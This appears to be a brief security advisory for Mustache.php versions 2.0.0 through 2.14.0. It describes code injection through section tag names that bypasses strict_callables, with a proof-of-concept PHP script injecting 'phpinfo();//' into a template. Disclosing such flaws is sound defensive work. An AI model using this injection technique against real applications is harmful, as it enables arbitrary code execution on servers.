In Mustache.php v2.0.0 through v2.14.0, Sections tag can lead to arbitrary php code execution even if strict_callables is true when section value is controllable.
<?php
require 'vendor/autoload.php';
$m = new Mustache_Engine([
'cache' => './cache',
'strict_callables'=>true
]);
echo $m->render('{{# repo
phpinfo();// }}
No repos :(
{{/ repo
phpinfo();// }}', array('repo' =>array()));
This vulnerability is capable of arbitrary command execution when attacker can control the value of tag